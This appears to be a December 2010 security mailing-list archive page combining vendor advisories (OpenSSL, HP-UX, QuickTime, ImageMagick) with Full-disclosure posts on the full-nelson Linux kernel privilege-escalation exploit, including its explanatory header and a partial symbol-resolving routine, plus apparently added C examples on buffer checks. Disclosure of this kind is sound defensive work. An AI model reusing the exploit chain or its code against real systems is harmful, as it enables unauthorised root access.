[USN-1029-1] OpenSSL vulnerabilities
===========================================================
Ubuntu Security Notice USN-1029-1             December 08, 2010
openssl vulnerabilities
CVE-2008-7270, CVE-2010-4180
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.10
Ubuntu 10.04 LTS
Ubuntu 10.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libssl0.9.8                     0.9.8a-7ubuntu0.14

Ubuntu 8.04 LTS:
  libssl0.9.8                     0.9.8g-4ubuntu3.13

Ubuntu 9.10:
  libssl0.9.8                     0.9.8g-16ubuntu3.5

Ubuntu 10.04 LTS:
  libssl0.9.8                     0.9.8k-7ubuntu8.5

Ubuntu 10.10:
  libssl0.9.8                     0.9.8o-1ubuntu4.3

After a standard system update you need to reboot your computer to
make all the necessary changes.

Details follow:

It was discovered that an old bug workaround in the SSL/TLS server code
allowed an attacker to modify the stored session cache ciphersuite. This
could possibly allow an attacker to downgrade the ciphersuite to a weaker
one on subsequent connections. (CVE-2010-4180)

It was discovered that an old bug workaround in the SSL/TLS server code
allowed an attacker to modify the stored session cache ciphersuite. An
attacker could possibly take advantage of this to force the use of a
disabled cipher. This vulnerability only affects the versions of OpenSSL
in Ubuntu 6.06 LTS, Ubuntu 8.04 LTS, and Ubuntu 9.10. (CVE-2008-7270)

Both issues are in the SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG workaround,
which is part of SSL_OP_ALL and is therefore enabled in most server
applications; a server that never sets SSL_OP_ALL is not exposed, but the
update is the safe fix regardless.

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14.diff.gz
      Size/MD5:    67296 3de8e480bcec0653b94001366e2f1f27
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14.dsc
      Size/MD5:     1465 a5f93020840f693044eb64af528fd01e
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a.orig.tar.gz
      Size/MD5:  3271435 1d16c727c10185e4d694f87f5e424ee1

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.14_amd64.udeb
      Size/MD5:   572012 b3792d19d5f7783929e473b6eb1e239c
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.14_amd64.deb
      Size/MD5:  2181644 746b74e9b6c42731ff2021c396789708
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.14_amd64.deb
      Size/MD5:  1696628 abe942986698bf86938312c5e344e0ba
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.14_amd64.deb
      Size/MD5:   880292 9d6d854dcef14c90ce24c1aa232a418a
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14_amd64.deb
      Size/MD5:   998466 9c51c334fd6c0b7c7b73340a01af61c8

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.14_i386.udeb
      Size/MD5:   509644 e1617d062d546f7dad2298bf6463bc3c
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.14_i386.deb
      Size/MD5:  2031000 6755c67294ab2ff03255a3bf7079ab26
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.14_i386.deb
      Size/MD5:  5195206 37fcd0cdefd012f0ea7d79d0e6a1b48f
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.14_i386.deb
      Size/MD5:  2660326 9083ddc71b89e4f4e95c4ca999bcedba
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14_i386.deb
      Size/MD5:   979408 518eaad303d089ab7dcc1b89fd019f19

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.14_powerpc.udeb
      Size/MD5:   558018 0e94d5f570a83f4b41bef642e032c256
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.14_powerpc.deb
      Size/MD5:  2189034 6588292725cfa33c8d56a61c3d8120b1
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.14_powerpc.deb
      Size/MD5:  1740524 0b98e950e59c538333716ee939710150
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.14_powerpc.deb
      Size/MD5:   865778 d1e44ecc73dea8a8a11cd4d6b7c38abf
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14_powerpc.deb
      Size/MD5:   984342 a3ff875c30b6721a1d6dd59d9a6393e0

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.14_sparc.udeb
      Size/MD5:   531126 7f598ce48b981eece01e0a1044bbdcc5
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7u
[security bulletin] HPSBUX02611 SSRT090201 rev.1 - HP-UX Running Threaded Processes, Remote Denial of Service (DoS)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02586517
Version: 1

HPSBUX02611 SSRT090201 rev.1 - HP-UX Running Threaded Processes, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2010-12-06
Last Updated: 2010-12-06

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running threaded processes. The vulnerability could be exploited remotely to create a Denial of Service (DoS).

References: CVE-2010-4108

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23 and HP-UX B.11.31 running threaded processes.

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2010-4108    (AV:N/AC:L/Au:S/C:N/I:N/A:C)       6.8
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

Note the Au:S component of the vector: the attacker needs an authenticated session on the host, and the impact is confined to availability (A:C).

RESOLUTION

HP has provided the following patches to resolve this vulnerability. The patches are available by contacting HP Support.

HP-UX Release / Patch ID
B.11.11 (11i v1) / PHKL_39133 or subsequent
B.11.23 (11i v2) / PHKL_39899 or subsequent
B.11.31 (11i v3) / PHKL_40944 or subsequent

MANUAL ACTIONS: No

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.11
===================
OS-Core.CORE2-KRN
action: install PHKL_39133 or subsequent

HP-UX B.11.23
===================
OS-Core.CORE2-KRN
action: install PHKL_39899 or subsequent

HP-UX B.11.31
===================
OS-Core.CORE2-KRN
action: install PHKL_40944 or subsequent

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 6 December 2010 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information
iDefense Security Advisory 12.07.10: Apple QuickTime PICT Memory Corruption Vulnerability
iDefense Security Advisory 12.07.10
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 07, 2010

I. BACKGROUND

QuickTime is Apple's media player product used to render video and other media. The PICT file format was developed by Apple Inc. in 1984. PICT files can contain both object-oriented images and bitmaps. For more information visit http://www.apple.com/quicktime/

II. DESCRIPTION

Remote exploitation of a memory corruption vulnerability in Apple Inc.'s QuickTime media player could allow attackers to execute arbitrary code in the context of the targeted user.

The vulnerability specifically exists in the way specially crafted PICT image files are handled by the QuickTime PictureViewer. When processing such files, QuickTime PictureViewer takes a value from the file and uses it as the length of a byte swap operation (the swap converts big endian data to little endian). QuickTime fails to validate that length against the destination buffer before using it. When the length is larger than the buffer actually allocated, the swap corrupts heap memory beyond the end of the buffer, which could lead to an exploitable condition.

III. ANALYSIS

Successful exploitation could allow attackers to execute arbitrary code in the context of the current user. To exploit this vulnerability, an attacker must persuade a victim into using QuickTime to open a specially crafted PICT picture file. This could be accomplished by either a direct link or a reference from a website under the attacker's control. An attacker could host a Web page containing a malformed PICT file; upon visiting the malicious Web page exploitation would occur and execution of arbitrary code would be possible. Alternatively a PICT file could be attached to an e-mail.

IV. DETECTION

QuickTime Player versions prior to 7.6.9 are vulnerable.

V. WORKAROUND

iDefense recommends disabling the QuickTime Plugin and altering the .pct, .pic and .pict filetype associations within the registry. Disabling the plugin will prevent Web browsers from utilizing QuickTime Player to view associated media files. Removing the filetype associations within the registry will prevent QuickTime Player and Picture Viewer from opening .pct, .pic and .pict files.

VI. VENDOR RESPONSE

Apple Inc. has released patches which address this issue. For more information, consult their advisory at the following URL:

http://support.apple.com/kb/HT4447

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010-3800 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

03/31/2010  Initial Vendor Notification
03/31/2010  Initial Vendor Reply
12/07/2010  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Hossein Lotfi (s0lute).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2010 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Re: [Full-disclosure] Linux kernel exploit
> Anyone tested this in sandbox yet?

00:37 linups:../expl/kernel > cat /etc/*release*
openSUSE 11.3 (i586)
VERSION = 11.3
00:37 linups:../expl/kernel > uname -r
2.6.34.4-0.1-desktop
00:37 linups:../expl/kernel > gcc _2.6.37.local.c -o test
00:37 linups:../expl/kernel > ./test
[*] Failed to open file descriptors.
Re: [Full-disclosure] Linux kernel exploit
Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel 2.6.35-22-generic). Works as expected.

Great job Dan. You're full of win!

Regards,
Ryan Sears

----- Original Message -----
From: "Cal Leeming [Simplicity Media Ltd]"
To: "Dan Rosenberg"
Cc: full-disclos...@lists.grok.org.uk, bugtraq@securityfocus.com
Sent: Tuesday, December 7, 2010 4:06:44 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Linux kernel exploit

Anyone tested this in sandbox yet?

On 07/12/2010 20:25, Dan Rosenberg wrote:
> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux. Please read the header for an explanation of what's going
> on. Without further ado, I present full-nelson.c:
>
> Happy hacking,
> Dan
>
> --snip--
>
> [snip: full-nelson.c, quoted in full; the source is in the original post below]
Re: [Full-disclosure] Linux kernel exploit
Anyone tested this in sandbox yet?

On 07/12/2010 20:25, Dan Rosenberg wrote:
> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux. Please read the header for an explanation of what's going
> on. Without further ado, I present full-nelson.c:
>
> Happy hacking,
> Dan
>
> --snip--
>
> [snip: full-nelson.c, quoted in full; the source is in the original post below]
Secunia Research: QuickTime Track Dimensions Buffer Overflow Vulnerability
======================================================================

                     Secunia Research 08/12/2010

       - QuickTime Track Dimensions Buffer Overflow Vulnerability -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Apple QuickTime 7.6.6 and 7.6.8

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System compromise
Where:  Remote

======================================================================
3) Vendor's Description of Software

"When you hop aboard QuickTime 7 Player, you're assured of a truly rich
multimedia experience."

Product Link:
http://www.apple.com/quicktime/player/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in QuickTime, which can
be exploited by malicious people to compromise a user's system.

The vulnerability is caused by a boundary error when copying track
content based on the track's dimensions: the size of the copy is derived
from dimensions declared in the file rather than from the buffer that
receives the data, and can be exploited to cause a heap-based buffer
overflow.

Successful exploitation may allow execution of arbitrary code.

======================================================================
5) Solution

Update to version 7.6.9.

======================================================================
6) Time Table

(Dates are day/month/year.)

04/05/2010 - Vendor notified.
05/05/2010 - Vendor response.
12/10/2010 - Vendor provides status update.
08/12/2010 - Public disclosure.

======================================================================
7) Credits

Discovered by Carsten Eiram, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-1508 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate customers
with verified and reliable vulnerability intelligence relevant to their
specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the security
and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-72/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
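Both QuickTime advisories on this page, the iDefense PICT byte-swap issue (CVE-2010-3800, above) and the Secunia track-dimensions copy (CVE-2010-1508, just above), describe the same defect: a length or size taken from the file drives a copy into a buffer that was sized independently. The following is an added example in C, not Apple's code and not from either advisory; the record layout (a 16-bit big-endian word count followed by big-endian 16-bit words) and all sample inputs are invented for the demonstration. It puts the vulnerable shape beside the checked one, and the checked parser rejects both ways a count can lie: claiming more words than the input carries, and claiming more than the destination holds.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_WORDS 8

/* Fixed-size destination, standing in for the heap buffer the advisories
 * describe: its capacity is decided independently of the file's count. */
struct decoded {
    uint16_t words[MAX_WORDS];
    size_t   nwords;
};

/* Vulnerable shape: `count` comes straight from the file and is trusted.
 * With count > MAX_WORDS this writes (and reads) past both buffers. It is
 * here only for contrast and is never called on the crafted inputs below. */
static void swap_words_unchecked(const uint8_t *src, size_t count, uint16_t *dst)
{
    for (size_t i = 0; i < count; i++)
        dst[i] = (uint16_t)((src[2 * i] << 8) | src[2 * i + 1]);
}

/* Hardened: the count is checked against the bytes actually present in the
 * input and against the capacity of the destination before anything is
 * written. Returns the number of words swapped, or -1 on a malformed record. */
static int swap_words_checked(const uint8_t *src, size_t srclen,
                              size_t count, uint16_t *dst, size_t capacity)
{
    if (count > capacity)        /* would overflow the destination */
        return -1;
    if (count > srclen / 2)      /* would read past the end of the record */
        return -1;
    for (size_t i = 0; i < count; i++)
        dst[i] = (uint16_t)((src[2 * i] << 8) | src[2 * i + 1]);
    return (int)count;
}

/* Parse one record: a 2-byte big-endian count, then `count` big-endian words. */
int parse_record(const uint8_t *buf, size_t len, struct decoded *out)
{
    if (len < 2)
        return -1;
    size_t count = ((size_t)buf[0] << 8) | buf[1];
    int n = swap_words_checked(buf + 2, len - 2, count, out->words, MAX_WORDS);
    if (n < 0)
        return -1;
    out->nwords = (size_t)n;
    return 0;
}

/* Constructed inputs (hypothetical format, not real PICT or MOV data). */
static const uint8_t benign[] = { 0x00, 0x03, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06 };
/* Claims 5 words but carries only one word of payload. */
static const uint8_t count_lies_about_input[] = { 0x00, 0x05, 0xAA, 0xBB };
/* Carries 9 complete words, one more than the destination holds. */
static const uint8_t count_exceeds_buffer[] = { 0x00, 0x09,
    0, 1, 0, 2, 0, 3, 0, 4, 0, 5, 0, 6, 0, 7, 0, 8, 0, 9 };

/* First decoded word of the benign record through the checked path (0x0102). */
int demo_benign(void)
{
    struct decoded d = {{0}, 0};
    if (parse_record(benign, sizeof benign, &d) != 0 || d.nwords != 3)
        return -1;
    return d.words[0];
}

/* The unchecked swap behaves identically on well-formed input, which is
 * exactly why the missing check survives ordinary testing. */
int demo_unchecked_on_benign(void)
{
    uint16_t words[MAX_WORDS] = {0};
    size_t count = ((size_t)benign[0] << 8) | benign[1];
    swap_words_unchecked(benign + 2, count, words);
    return words[0];
}

/* Verdict of parse_record on each crafted record (-1 = rejected). */
int demo_count_exceeds_input(void)
{
    struct decoded d = {{0}, 0};
    return parse_record(count_lies_about_input, sizeof count_lies_about_input, &d);
}

int demo_count_exceeds_buffer(void)
{
    struct decoded d = {{0}, 0};
    return parse_record(count_exceeds_buffer, sizeof count_exceeds_buffer, &d);
}

int main(void)
{
    printf("benign record, first word: 0x%04x\n", demo_benign());
    printf("count > input payload:     %d\n", demo_count_exceeds_input());
    printf("count > destination:       %d\n", demo_count_exceeds_buffer());
    return 0;
}
```

The order of the two checks matters only for the error reported; what matters for memory safety is that both happen before the first write, and that the input-length check uses the record's remaining bytes rather than the whole file.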
Linux kernel exploit
Hi all,

I've included here a proof-of-concept local privilege escalation exploit
for Linux. Please read the header for an explanation of what's going
on. Without further ado, I present full-nelson.c:

Happy hacking,
Dan

--snip--

/*
 * Linux Kernel <= 2.6.37 local privilege escalation
 * by Dan Rosenberg
 * @djrbliss on twitter
 *
 * Usage:
 * gcc full-nelson.c -o full-nelson
 * ./full-nelson
 *
 * This exploit leverages three vulnerabilities to get root, all of which were
 * discovered by Nelson Elhage:
 *
 * CVE-2010-4258
 * -------------
 * This is the interesting one, and the reason I wrote this exploit. If a
 * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
 * word will be written to a user-specified pointer when that thread exits.
 * This write is done using put_user(), which ensures the provided destination
 * resides in valid userspace by invoking access_ok(). However, Nelson
 * discovered that when the kernel performs an address limit override via
 * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
 * etc.), this override is not reverted before calling put_user() in the exit
 * path, allowing a user to write a NULL word to an arbitrary kernel address.
 * Note that this issue requires an additional vulnerability to trigger.
 *
 * CVE-2010-3849
 * -------------
 * This is a NULL pointer dereference in the Econet protocol. By itself, it's
 * fairly benign as a local denial-of-service. It's a perfect candidate to
 * trigger the above issue, since it's reachable via sock_no_sendpage(), which
 * subsequently calls sendmsg under KERNEL_DS.
 *
 * CVE-2010-3850
 * -------------
 * I wouldn't be able to reach the NULL pointer dereference and trigger the
 * OOPS if users weren't able to assign Econet addresses to arbitrary
 * interfaces due to a missing capabilities check.
 *
 * In the interest of public safety, this exploit was specifically designed to
 * be limited:
 *
 * * The particular symbols I resolve are not exported on Slackware or Debian
 * * Red Hat does not support Econet by default
 * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
 *   Debian
 *
 * However, the important issue, CVE-2010-4258, affects everyone, and it would
 * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
 * more sophisticated version of this that doesn't have the roadblocks I put in
 * to prevent abuse by script kiddies.
 *
 * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
 *
 * NOTE: the exploit process will deadlock and stay in a zombie state after you
 * exit your root shell because the Econet thread OOPSes while holding the
 * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.
 *
 * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
 */

#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>
/* The post carries twelve #include lines; only the three headers the code
   below needs are given here, the other names did not survive archiving. */

/* How many bytes should we clear in our
 * function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    struct utsname ver;
    int ret;
    int rep = 0;
    int oldstyle = 0;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            goto fallback;
        oldstyle = 1;
    }

repeat:
    ret = 0;
    while (ret != EOF) {
        if (!oldstyle)
            ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
        else {
            ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
            if (ret == 2) {
                char *p;
                /* skip the per-module symbol variants */
                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                    continue;
                /* strip an "_smp_<hash>" suffix from old-style ksyms names */
                p = strrchr(sname, '_');
                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_')
                        p--;
                    *p = '\0';
                }
            }
        }
        if (ret == 0) {
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr,
                    rep ? " (via System.map)" : "");
            fclose(f);
            return addr;
        }
    }

    fclose(f);
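The header above rests on one documented kernel behaviour: a thread created with CLONE_CHILD_CLEARTID gets a zero word stored at the caller-supplied address when it exits, through put_user(), which access_ok() is supposed to confine to userspace. The following is an added example in C that demonstrates that legitimate mechanism and nothing more; it is not part of full-nelson.c and not Dan Rosenberg's code. It points the clear-tid address at a word in its own address space, waits for the child to exit, and reports what the kernel wrote. The CVE-2010-4258 bug is that the same store can be steered at a kernel address when the thread OOPSes under KERNEL_DS; this program never does that. Linux only (clone(2) with these flags is Linux-specific); the sentinel value and stack size are arbitrary.

```c
#define _GNU_SOURCE
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Fallbacks in case <sched.h> was included without _GNU_SOURCE; these are
 * the kernel ABI values from <linux/sched.h>. */
#ifndef CLONE_VM
#define CLONE_VM 0x00000100
#endif
#ifndef CLONE_CHILD_CLEARTID
#define CLONE_CHILD_CLEARTID 0x00200000
#endif
/* glibc prototype, restated so the call compiles under any feature macros. */
int clone(int (*fn)(void *), void *stack, int flags, void *arg, ...);

/* Child body: return at once. The exit path, not this function, performs
 * the write we are observing. */
static int child_fn(void *arg)
{
    (void)arg;
    return 0;
}

/*
 * Spawn a child with CLONE_CHILD_CLEARTID pointing at `slot`, reap it, and
 * return what `slot` holds afterwards. Expected: 0, stored by the kernel's
 * exit path. Returns -1 if clone() or waitpid() fails.
 */
long observe_cleartid_write(void)
{
    const size_t stack_size = 64 * 1024;
    char *stack = malloc(stack_size);
    /* Non-zero sentinel so the kernel's store of 0 is observable. */
    volatile pid_t slot = (pid_t)0x5a5a5a5a;
    pid_t pid;
    long result;

    if (stack == NULL)
        return -1;

    /* CLONE_VM: share memory, so the child's exit-time write lands in our
     * `slot`. SIGCHLD: the child is reapable with waitpid() like a process. */
    pid = clone(child_fn, stack + stack_size,   /* stack grows down on x86 */
                CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
                NULL,                 /* argument to child_fn */
                NULL,                 /* parent_tid: unused */
                NULL,                 /* tls: unused */
                (pid_t *)&slot);      /* child_tid: the word cleared on exit */
    if (pid < 0) {
        perror("clone");
        free(stack);
        return -1;
    }
    if (waitpid(pid, NULL, 0) < 0) {
        perror("waitpid");
        free(stack);
        return -1;
    }
    /* The kernel clears child_tid in mm_release(), before the child becomes
     * reapable, so by the time waitpid() returns the store is visible. */
    result = (long)slot;
    free(stack);
    return result;
}

int main(void)
{
    long v = observe_cleartid_write();
    printf("child_tid word after child exit: 0x%lx (%s)\n", (unsigned long)v,
           v == 0 ? "cleared by the kernel" : "not cleared");
    return v == 0 ? 0 : 1;
}
```

This is the same mechanism glibc's pthread implementation uses to let pthread_join() notice a thread's exit via a futex on the cleared word; the interesting property for the exploit is only that the destination address is chosen by the caller and checked, not computed, by the kernel.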
[USN-1028-1] ImageMagick vulnerability
===========================================================
Ubuntu Security Notice USN-1028-1             December 07, 2010
imagemagick vulnerability
CVE-2010-4167
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 9.10
Ubuntu 10.04 LTS
Ubuntu 10.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  imagemagick                     7:6.3.7.9.dfsg1-2ubuntu1.2

Ubuntu 9.10:
  imagemagick                     7:6.5.1.0-1.1ubuntu3.1

Ubuntu 10.04 LTS:
  imagemagick                     7:6.5.7.8-1ubuntu1.1

Ubuntu 10.10:
  imagemagick                     7:6.6.2.6-1ubuntu1.1

In general, a standard system update will make all the necessary changes.

Details follow:

It was discovered that ImageMagick would search for configuration files in
the current directory. If a user were tricked into opening or processing an
image in an arbitrary directory, a local attacker could execute arbitrary
code with the user's privileges. ImageMagick's configuration files include
delegates.xml, which names the external commands it runs to convert
formats, so a planted copy in the working directory is enough to turn the
untrusted search path into command execution.

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2.diff.gz
      Size/MD5:   148538 d0cce9adb56ecc3678a3f624ae4b61a8
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2.dsc
      Size/MD5:     2002 ce7176e40236686799c83220863be81b
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemag ick/imagemagick_6.3.7.9.dfsg1.orig.tar.gz
      Size/MD5:  8314133 6aedd4a612531ad35b38fb9386f17122

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb
      Size/MD5:  1436188 ad5e6a839913506650ae9c7d3f9e24bd
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++10_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb
      Size/MD5:   168876 99268ef73e6f25b3f687283d7ef92f27
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb
      Size/MD5:   225966 97a0dd82dae7286cf412b1d750645d31
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick10_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb
      Size/MD5:  4223226 8f95fa4cee6634672af6a1425593624f
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb
      Size/MD5:  1298366 6fd8fa85987e15c5908f801fe20edaa9
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb
